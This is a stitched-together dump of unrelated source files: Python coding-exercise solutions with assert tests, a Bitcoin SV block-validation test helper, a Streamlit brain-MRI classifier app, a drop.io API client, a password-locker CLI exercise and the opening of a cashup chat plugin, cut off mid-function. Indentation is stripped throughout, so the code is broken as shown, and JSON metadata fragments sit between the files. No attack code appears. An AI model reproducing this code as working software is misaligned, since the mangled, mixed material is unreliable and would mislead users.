#### File: dfsComponentSize/python3/dfsComponentSize.py
```python
def dfsComponentSize(matrix, vertex):
stack = [vertex]
component = []
while stack:
v = stack.pop()
if v not in component:
component.append(v)
for w, connected in enumerate(matrix[v]):
if connected:
stack.append(w)
return len(component)
if __name__ == '__main__':
input0 = [[[False,True,False], [True,False,False], [False,False,False]], [[False,True,False,True], [True,False,False,False], [False,False,False,False], [True,False,False,False]], [[False,False,False], [False,False,False], [False,False,False]], [[False,True,False], [True,False,False], [False,False,False]], [[False,True,False,True], [True,False,True,False], [False,True,False,True], [True,False,True,False]]]
input1 = [0, 1, 0, 2, 2]
expectedOutput = [2, 3, 1, 1, 4]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = dfsComponentSize(input0[i], input1[i])
assert actual == expected, 'dfsComponentSize({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: differentRightmostBit/python3/differentRightmostBit.py
```python
from math import log2
def differentRightmostBit(n, m):
return 2**log2((n^m)&-(n^m))
if __name__ == '__main__':
input0 = [11, 7, 1, 64, 1073741823, 42]
input1 = [13, 23, 0, 65, 1071513599, 22]
expectedOutput = [2, 16, 1, 1, 131072, 4]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = differentRightmostBit(input0[i], input1[i])
assert actual == expected, 'differentRightmostBit({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: isInfiniteProcess/python3/isInfiniteProcess.py
```python
def isInfiniteProcess(a, b):
while a != b:
if (a > b):
return True
a += 1
b -= 1
return False
if __name__ == '__main__':
input0 = [2, 2, 2, 0, 3, 10, 5, 6, 10, 5]
input1 = [6, 3, 10, 1, 1, 10, 10, 10, 0, 5]
expectedOutput = [False, True, False, True, True, False, True, False, True, False]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = isInfiniteProcess(input0[i], input1[i])
assert actual == expected, 'isInfiniteProcess({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: isUppercase/python3/isUppercase.py
```python
def isUppercase(symbol):
return symbol >= 'A' and symbol <= 'Z'
if __name__ == '__main__':
input0 = ["A", "a", "0", "3", "-", "M", "x", "l", ".", "U"]
expectedOutput = [True, False, False, False, False, True, False, False, False, True]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = isUppercase(input0[i])
assert actual == expected, 'isUppercase({}) returned {}, but expected {}'.format(input0[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: largestNumber/python3/largestNumber.py
```python
def largestNumber(n):
return int('9'*n)
if __name__ == '__main__':
input0 = [2, 1, 7, 4, 3]
expectedOutput = [99, 9, 9999999, 9999, 999]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = largestNumber(input0[i])
assert actual == expected, 'largestNumber({}) returned {}, but expected {}'.format(input0[i], actual, expected)
```
#### File: metroCard/python3/metroCard.py
```python
def metroCard(lastNumberOfDays):
return [31] if lastNumberOfDays < 31 else [28, 30, 31]
if __name__ == '__main__':
input0 = [30, 31]
expectedOutput = [[31], [28, 30, 31]]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = metroCard(input0[i])
assert actual == expected, 'metroCard({}) returned {}, but expected {}'.format(input0[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: pagesNumberingWithInk/python3/pagesNumberingWithInk.py
```python
def pagesNumberingWithInk(current, numberOfDigits):
currentNumberOfDigits = len(str(current))
while numberOfDigits >= currentNumberOfDigits:
numberOfDigits -= currentNumberOfDigits
current += 1
currentNumberOfDigits = len(str(current))
return current-1
if __name__ == '__main__':
input0 = [1, 21, 8, 21, 76, 80]
input1 = [5, 5, 4, 6, 250, 1000]
expectedOutput = [5, 22, 10, 23, 166, 419]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = pagesNumberingWithInk(input0[i], input1[i])
assert actual == expected, 'pagesNumberingWithInk({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: percentageGreen/python2/percentageGreen.py
```python
def percentageGreen(green, total):
return float(green) / total * 100
if __name__ == '__main__':
input0 = [2, 4]
input1 = [5, 5]
expectedOutput = [40, 80]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = percentageGreen(input0[i], input1[i])
assert actual == expected, 'percentageGreen({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
``` |
{
"source": "JimmyNLose/Sant_rOyOS_SV",
"score": 2
} |
#### File: test/functional/bsv_pbv_common.py
```python
from test_framework.util import wait_until
def wait_for_waiting_blocks(hashes, node, log):
oldArray = []
def should_wait():
nonlocal oldArray
blocks = node.getwaitingblocks()
if oldArray != blocks:
log.info("currently waiting blocks: " + str(blocks))
oldArray = blocks
return hashes.issubset(blocks)
wait_until(should_wait)
def wait_for_validating_blocks(hashes, node, log):
oldArray = []
def should_wait():
nonlocal oldArray
blocks = node.getcurrentlyvalidatingblocks()
if oldArray != blocks:
log.info("currently validating blocks: " + str(blocks))
oldArray = blocks
return hashes.issubset(blocks)
wait_until(should_wait)
def wait_for_not_validating_blocks(hashes, node, log):
oldArray = []
def should_wait():
nonlocal oldArray
blocks = node.getcurrentlyvalidatingblocks()
if oldArray != blocks:
log.info("currently validating blocks: " + str(blocks))
oldArray = blocks
return hashes.isdisjoint(blocks)
wait_until(should_wait)
``` |
{
"source": "Jimmy-Nnilsson/StudieGrupp3_MLProjekt",
"score": 3
} |
#### File: poc/streamlit_files/BE.py
```python
import streamlit as st
from PIL import Image
import numpy as np
from streamlit import caching
import pathlib
import os
import time
# from BEX_utils_animal import dummy_model
from pre_process_cropping_AP import BEX_cropping
from utils import *
def main():
st.sidebar.image("bex_cube_certified.png", use_column_width=True)
add_selectbox = st.sidebar.selectbox("Machine model operations",("Home screen","Evaluate image", "View Model data"))
if add_selectbox == "Home screen":
st.write("# Lets empower your brain!")
st.image('HS_brain_scan.jpg', width = 300)
# ---------------------------------------------------
if add_selectbox == "Evaluate image":
st.write("# Lets analyse your brain")
filename = st.file_uploader(label = 'Drag and drop file (image of brain MRI) to examine')
if add_selectbox == "Evaluate image":
if st.button("Put model to work!"):
get_path = os.getcwd()
src_path = pathlib.Path(get_path)
comp_path = src_path / filename.name # issues with streamlit and path
if filename is not None:
image = Image.open(filename)
img_array = np.array(image)
# st.write((np.stack(img_array,img_array, axis=2).shape))
# pipelining for size and cropping
# obj = BEX_cropping(comp_path)
obj = BEX_cropping()
st.write(filename.name)
np_croppped = obj.calculate_cropping(img_array)
#st.image(np_croppped)
pred = model.predict(np_croppped)
result_str = ""
if pred < 0.5:
pct = (0.5 - pred[0][0]) * 2
else:
pct = (pred[0][0] - 0.5)*2
result_str = f"{CLASSES[int(pred+0.5)]} with {round(pct*100, 1)}% certainty"
#st.write(f"pred output:{round(pred[0][0], 3)}")
image, heatmap, superimposed_img = model.grad_cam(np_croppped)
col11, col12, col13 = st.columns(3)
with col11:
st.write("Original picture")
st.image(image)
with col12:
st.write("With heatcam overlay")
st.image(superimposed_img)
with col13:
st.write("Heatcam")
uint_heatmap = (np.uint8(255 * heatmap))
st.image(cv2.applyColorMap(uint_heatmap, cv2.COLORMAP_OCEAN))
st.write(result_str)
# ---------------------------------------------------
if add_selectbox == "View Model data":
st.write("# Metrics and stuff")
col1, col2 = st.columns(2)
with col1:
image = Image.open("train_eval.png")
st.image(image, caption="Plots from training model")
with col2:
image = Image.open("train_eval2.png")
st.image(image, caption="Plots from training model")
if __name__ == "__main__":
CLASSES = {0 : "Cancer found", 1 : "No cancer"}
model = Model_Class('vgg19_MRI_Baseline_3.h5')
main()
``` |
{
"source": "jimmyorourke/ctypesgen2",
"score": 3
} |
#### File: jimmyorourke/ctypesgen2/ctypes_helpers.py
```python
import ctypes
from typing import Any, Dict
def to_dict(struct: ctypes.Structure) -> Dict[str, Any]:
"""Convert a ctypes.Structure object to a Python dict."""
result = {}
def get_value(field_value):
if hasattr(field_value, "_length_"):
# Probably an array
field_value = get_array(field_value)
elif hasattr(field_value, "_fields_"):
# Probably another struct
field_value = to_dict(field_value)
return field_value
def get_array(array):
# Array might be nested or contain structs
return [get_value(value) for value in array]
# Danger! struct._fields_ may have either 2 or 3 elements!
for field in struct._fields_:
field_name = field[0]
field_value = getattr(struct, field_name)
# field_value will either be the value of a primitive, or the type name of nested type
result[field_name] = get_value(field_value)
return result
# Monkey patch the __str__ member for ctypes.Structure objects to use the stringified dict representation.
# The __dict__ of built-in types is a dictproxy object that is read only, however we are able to get mutable access
# through the garbage collector. This is a higher level and safer method than applying a curse with the forbiddenfruit
# package. It might not be safe to modify the __repr__ of a built-in, so only __str__ is adjusted.
import gc
underlying_dict = gc.get_referents(ctypes.Structure.__dict__)[0]
underlying_dict["__str__"] = lambda self: str(to_dict(self))
```
#### File: jimmyorourke/ctypesgen2/generate_ctypes.py
```python
import argparse
import os
import sys
if __name__ == "__main__":
parser = argparse.ArgumentParser("Generate Python bindings from C header(s) and dynamic libraries")
parser.add_argument("--libclang-directory", required=False, type=str, help="Directory containing libclang shared object (dylib / so / dll)")
parser.add_argument("--headers", type=str, nargs="+", help="List of C Header(s) to export to Python")
parser.add_argument("--libraries", type=str, nargs="+", help="Libraries to search for exported symbols")
parser.add_argument("--flags", type=str, default="", help="Additional compiler flags to pass to clang")
parser.add_argument("--output", type=str, help="Python wrapper file to generate")
args = parser.parse_args()
# Import Clang Wrapper
# TODO: Is this still true?
# On Windows, PATH is searched for libclang.dll, regardless of clang.cindex.Config, so prepend the Clang library directory to the path to ensure it is found.
if os.name == "nt":
os.environ['PATH'] = args.libclang_directory + os.pathsep + os.environ["PATH"]
import clang.cindex
clang.cindex.Config.set_library_path(args.libclang_directory)
# Import ctypeslib2 Code Generator
import ctypeslib
from ctypeslib.codegen.codegenerator import generate_code
from ctypeslib.codegen import typedesc
from ctypes import CDLL, RTLD_LOCAL
from ctypes.util import find_library
# local library finding
def load_library(name, mode=RTLD_LOCAL):
ret = None
if os.name == "nt":
from ctypes import WinDLL
# WinDLL does demangle the __stdcall names, so use that.
ret = WinDLL(name, mode=mode)
else:
path = find_library(name)
if path is None:
# Maybe 'name' is not a library name in the linker style,
# give CDLL a last chance to find the library.
path = name
ret = CDLL(path, mode=mode)
if ret is None:
raise Exception("Unable to open library %s" % name)
return ret
# Additional available types that we don't translate: Alias, Class, Macro.
# We shouldn't have any aliases or classes in pure C code.
# Enabling macros results in translation issues with the visibility attribute macros when being run as part of the build.
types = (typedesc.Variable,
typedesc.Structure,
typedesc.Enumeration,
typedesc.Function,
typedesc.Structure,
typedesc.Typedef,
typedesc.Union)
with open(args.output, 'w') as output:
generate_code(srcfiles=args.headers, # files to generate python objects from
outfile=output,
expressions=None,
symbols=None,
verbose=True,
generate_comments=False, # get duplicated if a header is included multiple times
known_symbols=None,
searched_dlls=[load_library(d) for d in args.libraries],
types=types,
preloaded_dlls=None,
generate_docstrings=False, # neat but don't seem useful
generate_locations=False,
filter_location=True,
flags=args.flags.split(" ")
)
``` |
{
"source": "jimmyorr/dropio-api-python",
"score": 3
} |
#### File: src/dropio/client.py
```python
__version__ = '0.1.1'
import httplib
import logging
import mimetypes
import mimetools
import os.path
import sys
import urllib
import urllib2
import uuid
from optparse import OptionParser
from urlparse import urlsplit
try:
import json
except ImportError:
import simplejson as json
from dropio.resource import Asset, Drop, Link, Note
_API_VERSION = '2.0'
_API_FORMAT = 'json'
_API_BASE_URL = 'http://api.drop.io/'
_FILE_UPLOAD_URL = 'http://assets.drop.io/upload'
_DROPS = 'drops/'
_ASSETS = '/assets/'
_COMMENTS = '/comments/'
_SEND_TO = '/send_to'
_DROPIO_TRUE = 'true'
_DROPIO_FALSE = 'false'
#########################################################################
# HTTP ERRORS: from http://dev.drop.io/rest-api-reference/response-codes/
#
# TODO: consider having these inherit from urllib2.HTTPError
#########################################################################
class Error(Exception):
pass
class BadRequestError(Error):
"""400 Bad Request
Something is wrong with the request in general (i.e. missing parameters,
bad data, etc).
"""
pass
class InternalServerError(Error):
"""500 Internal Server Error
Something that [drop.io] did not account for has gone wrong.
"""
pass
class ForbiddenError(Error):
"""403 Forbidden
You did not supply a valid API token or an authorization token.
"""
pass
class ResourceNotFoundError(Error):
"""404 Not Found
The resource requested is not found or not available.
"""
pass
class ExpirationLengthEnum(object):
ONE_DAY_FROM_NOW = '1_DAY_FROM_NOW'
ONE_WEEK_FROM_NOW = '1_WEEK_FROM_NOW'
ONE_MONTH_FROM_NOW = '1_MONTH_FROM_NOW'
ONE_YEAR_FROM_NOW = '1_YEAR_FROM_NOW'
ONE_DAY_FROM_LAST_VIEW = '1_DAY_FROM_LAST_VIEW'
ONE_WEEK_FROM_LAST_VIEW = '1_WEEK_FROM_LAST_VIEW'
ONE_MONTH_FROM_LAST_VIEW = '1_MONTH_FROM_LAST_VIEW'
ONE_YEAR_FROM_LAST_VIEW = '1_YEAR_FROM_LAST_VIEW'
valid_expiration_lengths = frozenset((
ONE_DAY_FROM_NOW,
ONE_WEEK_FROM_NOW,
ONE_MONTH_FROM_NOW,
ONE_YEAR_FROM_NOW,
ONE_DAY_FROM_LAST_VIEW,
ONE_WEEK_FROM_LAST_VIEW,
ONE_MONTH_FROM_LAST_VIEW,
ONE_YEAR_FROM_LAST_VIEW))
class _NullHandler(logging.Handler):
"""default logger does nothing"""
def emit(self, record):
pass
class DropIoClient(object):
"""Client for the Drop.io service."""
def __init__(self, api_key, logger=None):
self.__base_params_dict = {}
self.__base_params_dict['api_key'] = api_key
self.__base_params_dict['version'] = _API_VERSION
self.__base_params_dict['format'] = _API_FORMAT
if logger:
self.logger = logger
else:
handler = _NullHandler()
self.logger = logging.getLogger()
self.logger.addHandler(handler)
def __get(self, base_url, params_dict):
params = urllib.urlencode(params_dict)
stream = urllib2.urlopen(base_url + '?' + params)
body_dict = json.load(stream)
stream.close()
return body_dict
def __post(self, url, params_dict):
params = urllib.urlencode(params_dict)
stream = urllib2.urlopen(url, params)
body_dict = json.load(stream)
stream.close()
return body_dict
def __post_multipart(self, url, params_dict):
def encode_multipart_formdata(params_dict):
boundary = mimetools.choose_boundary()
body = ''
for key, value in params_dict.iteritems():
if isinstance(value, tuple):
filename, value = value
body += '--%s\r\n' % boundary
body += 'Content-Disposition: form-data;'
body += 'name="%s";' % str(key)
body += 'filename="%s"\r\n' % str(filename)
body += 'Content-Type: %s\r\n\r\n' % str(get_content_type(filename))
body += '%s\r\n' % str(value)
else:
body += '--%s\r\n' % boundary
body += 'Content-Disposition: form-data; name="%s"\r\n\r\n' % str(key)
body += '%s\r\n' % str(value)
body += '--%s--\r\n' % boundary
content_type = 'multipart/form-data; boundary=%s' % boundary
return body, content_type
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
body, content_type = encode_multipart_formdata(params_dict)
headers = {'content-type': content_type}
url_parts = urlsplit(url)
connection = httplib.HTTPConnection(url_parts.netloc)
connection.request('POST', url_parts.path, body, headers)
response = connection.getresponse()
body_dict = json.load(response)
connection.close()
return body_dict
def __put(self, url, params_dict):
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url, data=json.dumps(params_dict))
request.add_header('Content-Type', 'application/json')
request.get_method = lambda: 'PUT'
stream = opener.open(request)
body_dict = json.load(stream)
stream.close()
opener.close()
return body_dict
def __delete(self, url, params_dict):
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url, data=json.dumps(params_dict))
request.add_header('Content-Type', 'application/json')
request.get_method = lambda: 'DELETE'
stream = opener.open(request)
body_dict = json.load(stream)
stream.close()
opener.close()
return body_dict
def __asset_dict_to_asset(self, asset_dict):
asset = None
if 'contents' in asset_dict:
asset = Note(asset_dict)
elif 'url' in asset_dict:
asset = Link(asset_dict)
else:
asset = Asset(asset_dict)
return asset
################
# DROP RESOURCE
################
def create_drop(self, drop_name=None):
"""
Returns:
dropio.resource.Drop
"""
params_dict = {}
if drop_name:
params_dict['name'] = drop_name
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS
drop_dict = self.__post(url, params_dict)
drop = Drop(drop_dict)
return drop
def get_drop(self, drop_name, token=None):
"""
Returns:
dropio.resource.Drop
"""
assert drop_name
params_dict = {}
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name
try:
drop_dict = self.__get(url, params_dict)
except urllib2.HTTPError, error:
# TODO: move this into reusable method
if error.code == 400:
raise BadRequestError()
elif error.code == 403:
raise ForbiddenError()
if error.code == 404:
raise ResourceNotFoundError()
if error.code == 500:
raise ResourceNotFoundError()
else:
raise error
drop = Drop(drop_dict)
return drop
def update_drop(self, drop, token):
"""
Returns:
dropio.resource.Drop
"""
assert drop
assert token
params_dict = {}
params_dict['token'] = token
if drop.guests_can_comment is not None:
if drop.guests_can_comment:
params_dict['guests_can_comment'] = _DROPIO_TRUE
else:
params_dict['guests_can_comment'] = _DROPIO_FALSE
if drop.guests_can_add is not None:
if drop.guests_can_add:
params_dict['guests_can_add'] = _DROPIO_TRUE
else:
params_dict['guests_can_add'] = _DROPIO_FALSE
if drop.guests_can_delete is not None:
if drop.guests_can_delete:
params_dict['guests_can_delete'] = _DROPIO_TRUE
else:
params_dict['guests_can_delete'] = _DROPIO_FALSE
if drop.expiration_length:
params_dict['expiration_length'] = drop.expiration_length
if drop.password:
params_dict['password'] = <PASSWORD>
if drop.admin_password:
params_dict['admin_password'] = <PASSWORD>
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop.name
drop_dict = self.__put(url, params_dict)
drop = Drop(drop_dict)
return drop
def delete_drop(self, drop_name, token):
assert drop_name
assert token
params_dict = {}
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name
self.__delete(url, params_dict)
return
#################
# ASSET RESOURCE
#################
def create_link(self, drop_name, link_url,
title=None, description=None, token=None):
"""
Returns:
dropio.resource.Link
"""
assert drop_name
assert link_url
params_dict = {}
params_dict['url'] = link_url
if title:
params_dict['title'] = title
if description:
params_dict['description'] = description
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS
link_dict = self.__post(url, params_dict)
link = Link(link_dict)
return link
def create_note(self, drop_name, contents, title=None, token=None):
"""
Returns:
dropio.resource.Note
"""
assert drop_name
assert contents
params_dict = {}
params_dict['contents'] = contents
if title:
params_dict['title'] = title
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS
note_dict = self.__post(url, params_dict)
note = Note(note_dict)
return note
def create_file_from_readable(self, drop_name, readable, file_name=None, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert hasattr(readable, 'read')
file_name = file_name or str(uuid.uuid4())
params_dict = {}
params_dict['drop_name'] = drop_name
if token:
params_dict['token'] = token
params_dict['file'] = (file_name, readable.read())
params_dict.update(self.__base_params_dict)
url = _FILE_UPLOAD_URL
asset_dict = self.__post_multipart(url, params_dict)
asset = Asset(asset_dict)
return asset
def create_file(self, drop_name, file_name, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert file_name
assert os.path.isfile(file_name)
stream = open(file_name, 'rb')
asset = self.create_file_from_readable(drop_name, stream, file_name, token)
stream.close()
return asset
def get_asset_list(self, drop_name, page=1, token=None):
"""
Returns:
generator of dropio.resource.Asset
"""
assert drop_name
params_dict = {}
params_dict['page'] = page
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS
response = self.__get(url, params_dict)
for asset_dict in response['assets']:
yield Asset(asset_dict)
return
def get_all_asset_list(self, drop_name, token=None):
"""
Returns:
generator of dropio.resource.Asset
"""
assert drop_name
page = 1
while True:
assets = self.get_asset_list(drop_name, page, token)
empty = True
for asset in assets:
yield asset
empty = False
if empty:
break
page += 1
return
def get_asset(self, drop_name, asset_name, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert asset_name
params_dict = {}
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset_name
asset_dict = self.__get(url, params_dict)
asset = self.__asset_dict_to_asset(asset_dict)
return asset
def update_asset(self, drop_name, asset, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert asset
params_dict = {}
if token:
params_dict['token'] = token
if asset.title:
params_dict['title'] = asset.title
if asset.description:
params_dict['description'] = asset.description
if hasattr(asset, 'url') and asset.url:
params_dict['url'] = asset.url
if hasattr(asset, 'contents') and asset.contents:
params_dict['contents'] = asset.contents
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset.name
asset_dict = self.__put(url, params_dict)
asset = self.__asset_dict_to_asset(asset_dict)
return asset
def delete_asset(self, drop_name, asset_name, token=None):
assert drop_name
assert asset_name
params_dict = {}
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset_name
self.__delete(url, params_dict)
return
def __send_asset(self, drop_name, asset_name, medium, params_dict, token=None):
assert drop_name
assert asset_name
params_dict['medium'] = medium
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset_name + _SEND_TO
self.__post(url, params_dict)
return
def send_asset_to_fax(self, drop_name, asset_name, fax_number, token=None):
assert fax_number
params_dict = {}
params_dict['fax_number'] = fax_number
self.__send_asset(drop_name, asset_name, 'fax', params_dict, token)
return
def send_asset_to_drop(self, drop_name, asset_name, drop_name_dest, token=None):
assert drop_name_dest
params_dict = {}
params_dict['drop_name'] = drop_name_dest
self.__send_asset(drop_name, asset_name, 'drop', params_dict, token)
return
def send_asset_to_email(self, drop_name, asset_name, emails, message=None, token=None):
assert emails
params_dict = {}
params_dict['emails'] = emails
if message:
params_dict['message'] = message
self.__send_asset(drop_name, asset_name, 'email', params_dict, token)
return
###################
# COMMENT RESOURCE
###################
def get_comment_list(self, drop_name, asset_name, token=None):
"""
Returns:
list of dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def create_comment(self, drop_name, asset_name, contents, token=None):
"""
Returns:
dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def get_comment(self, drop_name, asset_name, comment_id, token=None):
"""
Returns:
dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def update_comment(self, drop_name, asset_name, comment, token):
"""
Returns:
dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def delete_comment(self, drop_name, asset_name, comment_id, token):
"""
Returns:
???
"""
# TODO: implement me
raise NotImplementedError()
def main(argv=None):
usage = "usage: %prog [options]"
parser = OptionParser(usage, version="%prog " + __version__)
parser.set_defaults(api_key=None,
verbosity=0,
drop_name=None,
token=None,
files_to_create=[],
links_to_create=[],
notes_to_create=[])
parser.add_option("-k", "--key",
action="store", dest="api_key", metavar="API_KEY",
help="REQUIRED! get key from http://api.drop.io/")
parser.add_option("-v", "--verbose",
action="count", dest="verbosity")
parser.add_option("-d", "--drop_name",
action="store", dest="drop_name", metavar="DROP")
parser.add_option("-t", "--token",
action="store", dest="token", metavar="TOKEN")
parser.add_option("-f", "--file",
action="append", dest="files_to_create", metavar="FILE",
help="Use a single dash '-' to read from stdin")
parser.add_option("-l", "--link",
action="append", dest="links_to_create", metavar="LINK")
parser.add_option("-n", "--note",
action="append", dest="notes_to_create", metavar="NOTE")
(options, unused_args) = parser.parse_args()
if options.api_key is None:
print parser.expand_prog_name("%prog: --key is a required option")
print parser.expand_prog_name("Try `%prog --help' for more information.")
return 1
logger = logging.getLogger()
logging_level = logging.WARNING - (options.verbosity * 10)
logger.setLevel(logging_level)
handler = logging.StreamHandler()
handler.setLevel(logging_level)
logger.addHandler(handler)
client = DropIoClient(options.api_key, logger)
try:
drop = client.get_drop(options.drop_name, options.token)
except Exception: # TODO: fix diaper anti-pattern
drop = client.create_drop(options.drop_name)
for file_to_create in options.files_to_create:
logger.info("Adding file %s to drop %s" % (file_to_create, drop.name))
if file_to_create == '-':
client.create_file_from_readable(drop.name, sys.stdin, token=options.token)
else:
client.create_file(drop.name, file_to_create, options.token)
for link_to_create in options.links_to_create:
logger.info("Adding link '%s' to drop %s" % (link_to_create, drop.name))
client.create_link(drop.name, link_to_create, options.token)
for note_to_create in options.notes_to_create:
logger.info("Adding %s to drop %s" % (note_to_create, drop.name))
client.create_note(drop.name, note_to_create, options.token)
return 0
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "jimmy-oss/password-locker",
"score": 4
} |
#### File: jimmy-oss/password-locker/run.py
```python
from user import user
def create_account(fname,p_number):
'''
Function to create a new account
'''
new_user = user(fname,p_number)
return new_user
def save_user(user):
'''
Function to save account
'''
user.save_user()
def confirm_password(account):
'''
Function to confirm password
'''
user.confirm_password(account)
def default_user_name(f_name):
'''
function for a default user password
'''
user.default_user_name(f_name)
def del_account():
'''
Function to delete a account
'''
user.delete_user()
def find_contact(account):
'''
Function that finds an account by name and returns the account searched
'''
return user.find_by_account(account)
def check_existing_account(account):
'''
Function that check if account exists with that number and return a Boolean
'''
return user.find_by_password(account)
def display_users():
'''
Function that returns all the saved contacts
'''
return user.display_users()
def copy_password():
'''
Function that copy pastes users password
'''
return user.copy_password()
def main():
print("Hello Welcome to password locker. What is your username?")
user_name = input()
print(f"Hello {user_name}. what would you like to do?")
print('\n')
while True:
print("Use these short codes : cc - create a new contact,lg - login into an account dc - display contacts, fc -find an account, ex -exit the password locker ")
short_code = input().lower()
if short_code == 'cc':
print("New Account")
print("-"*10)
print ("Your username ....")
f_name = input()
print("Password ...")
p_number = input()
print("confirm your password ....")
p_number = input()
save_user(create_account(f_name,p_number)) # create and save new account.
print(f"You have successfully created a new {f_name} {p_number} account!!")
print ('\n')
elif short_code == 'lg':
print("Welcome")
print("Enter username")
f_name= input()
print("Enter password")
p_number=input()
print ('\n')
save_user(create_account(f_name,p_number)) # create and save new account.
print(f"Welcome to your password locker {f_name} {p_number} account!!")
print ('\n')
elif short_code == 'dc':
if display_users():
print("Here is a list of all your accounts")
print('\n')
for user in display_users():
print(f"{f_name} {p_number}")
print('\n')
else:
print('\n')
print("You don't seem to have any account saved yet create a new account!")
print('\n')
elif short_code == 'fc':
print("Enter the account you want to search for")
search_contact = input()
if check_existing_account(search_contact):
search_contact = find_contact(search_contact)
print(f"{search_contact.f_name}")
print('-' * 20)
print(f"username.......{search_contact.f_name}")
else:
print("That contact does not exist")
elif short_code == "ex":
print(" You have successfully exited in your account Bye .......")
break
else:
print("I really didn't get that. Please use the valid short codes command!")
if __name__ == '__main__':
main()
```
#### File: jimmy-oss/password-locker/user.py
```python
class user():
"""
Class that generates new instances of contacts.
"""
User_list = [] # Empty contact list
def __init__(self,username,password):
# docstring removed for simplicity
self.first_name= username
self.password= password
# Init method up here
def save_user(self):
'''
save_user method saves user objects into user_list
'''
user.User_list.append(self)
def delete_user(self):
'''
delete_user method deletes a saved user from the User_list
'''
user.User_list.remove(self)
@classmethod
def find_by_password(cls,number):
'''
Method that takes in a password and returns a user that matches that password.
Args:
number: password to search for
Returns :
user of person that matches the password.
'''
for user in cls.User_list:
if user.password == number:
return user
@classmethod
def user_exist(cls,number):
'''
Method that checks if a user exists from the user list.
Args:
number: Password to search if it exists
Returns :
Boolean: True or false depending if the user exists
'''
for user in cls.User_list:
if user.password == number:
return True
return False
@classmethod
def display_users(cls):
'''
method that returns the User list
'''
return cls.User_list
``` |
{
"source": "JimmyPesto/nio-smith",
"score": 3
} |
#### File: plugins/cashup/cashup.py
```python
from types import AsyncGeneratorType
from typing import Match
from core.plugin import Plugin
import logging
# importing cash up stuff
# functools for reduce()
import functools
# importing regular expressions for parsing numbers
import re
logger = logging.getLogger(__name__)
plugin = Plugin("cashup", "General", "A very simple cashup plugin to share expenses in a group")
def setup():
# first command will be called when plugin name is called
